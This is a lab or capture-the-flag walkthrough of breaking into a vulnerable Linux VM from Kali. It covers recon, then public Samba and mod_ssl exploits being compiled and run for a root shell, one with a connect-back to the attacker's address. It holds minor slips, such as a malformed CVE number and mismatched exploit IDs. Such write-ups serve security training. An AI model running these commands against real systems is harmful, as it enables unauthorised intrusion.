For the attacking machine, I will be using Kali 2017.1. Once booted, this is what the victim machine will look like:
We start the attack by finding the IP of the victim machine by using the netdiscover command: $ netdiscover
Now that we know our target IP, let’s start by scanning the ports and try to get more information about it:
The scan shows us that the following ports are open:
Port 22 – Running OpenSSH Port 80 – Running Apache Web server Port 111 – Running RPC Port 139 – Running Samba Port 443 – Running Apache. We server over ssl Port 1024 – Running RPC
Upon visiting the web application (on port 80 via http:// and port 443 via https://) we just see a default Test Page:
Moreover, I did not find anything interesting within their source code as well. Going back to see the services that are being run, Samba is something that interests me. So, I run an enumeration on it: $ enum4linux -a 172.16.92.138 > output.txt
This gives us a lot of information including the Samba version is being used, 2.2.1a. Upon doing a simple exploit, I see that a Remote Code Execution exploit is available: $ searchsploit samba 2.2
I copy the exploit to the root directory as exploit.c: $ cp /usr/share/exploitdb/platforms/linux/remote/10.c exploit.c then I compile the exploit via gcc: $ gcc -o samba exploit.c I am given the final file proper permissions: $ chmod 755 samba Let’s dry run the exploit and see what all parameters are required:
Okay then, I think we are ready to use this: $ ./samba -b 0 -c 172.16.92.133 172.16.92.138
And we are in with root privileges! Now we need to find the email. I found the email under /var/mail:
While playing around it with more, I found that the machine could be exploited another way via Metasploit (CVE-2003-201): $ use exploit/linux/samba/trans2open
Another way of getting into the machine was via exploit mod_ssl (CVE 2002 – 0082). I found its exploit at https://www.exploit-db.com/exploits/764/ $ gcc -o OpenFuck 746.c -lcrypto Note: Since the exploit is old, you can update it by following the following tutorial: http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/. Also, keep in mind that you will require libssl and libssl-dev before you compile the exploit.
Let’s exploit! $ ./OpenFuck 0x6b 172.16.92.138 443 -c 40
